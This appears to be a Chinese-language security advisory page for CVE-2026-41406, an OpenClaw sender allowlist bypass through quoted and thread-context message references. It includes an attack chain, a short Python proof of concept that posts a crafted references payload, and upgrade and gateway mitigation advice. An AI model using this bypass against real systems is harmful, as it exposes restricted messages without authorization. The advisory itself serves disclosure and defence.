CVE-2026-41406 CVSS 5.4 中危

CVE-2026-41406 OpenClaw发送者白名单绕过漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41406

漏洞类型

权限绕过

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.31之前的版本中存在一个安全漏洞，即发送者白名单绕过漏洞。该漏洞允许远程攻击者利用消息上下文机制，绕过安全限制访问本应受限的消息内容。通过利用被引用消息、根消息以及线程上下文，攻击者可以在未授权的情况下检索敏感信息，对系统机密性构成威胁。

技术细节

该漏洞的根本原因在于OpenClaw在处理消息线程和上下文引用时的访问控制逻辑存在缺陷。具体而言，当系统渲染或处理消息时，会提取并显示被引用的消息（quoted messages）、根消息（root messages）以及线程上下文（thread context）。然而，在受影响版本中，系统仅对当前消息的发送者进行白名单校验，却忽略了对被引用内容来源的权限验证。攻击者可以利用这一点，发送一条正常消息，但在其引用结构中嵌入受限消息的ID。由于系统默认信任这些引用上下文，它会自动检索并返回这些本应受保护的内容给攻击者。这种利用方式无需复杂认证，仅需用户交互即可触发，从而成功绕过发送者白名单机制，导致敏感信息泄露。

攻击链分析

STEP 1

侦察

攻击者识别目标OpenClaw实例，并发现存在受限的消息ID。

STEP 2

构造载荷

攻击者创建一条新消息，在消息的引用字段或上下文字段中填入想要窃取的受限消息ID。

STEP 3

发送请求

攻击者发送该消息到OpenClow系统，触发系统获取引用内容的逻辑。

STEP 4

绕过与泄露

系统仅检查发送者身份，未检查引用来源权限，直接返回受限消息内容给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# Proof of Concept for CVE-2026-41406
# This script demonstrates how to bypass the sender allowlist
# by referencing a restricted message ID in a new message context.

import requests

TARGET_URL = "http://target-openclaw-instance/api/message"
RESTRICTED_MSG_ID = "msg-restricted-123" # ID of the message to access

def exploit():
    headers = {"Content-Type": "application/json"}
    
    # Construct payload bypassing allowlist via context references
    payload = {
        "body": "Check this context",
        "context": {
            "type": "reply",
            "references": [RESTRICTED_MSG_ID] # Vulnerability trigger
        }
    }

    try:
        response = requests.post(TARGET_URL, json=payload, headers=headers)
        if response.status_code == 200:
            print("[+] Exploit successful! Restricted data leaked.")
            print("[+] Data:", response.text)
        else:
            print("[-] Request failed.")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    exploit()

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施

建议立即升级OpenClaw至2026.3.31或更高版本以修复此漏洞。若暂时无法升级，应在网关层面实施严格的入站规则，检测并拦截包含异常引用头或上下文引用的消息，防止系统处理未授权的引用请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表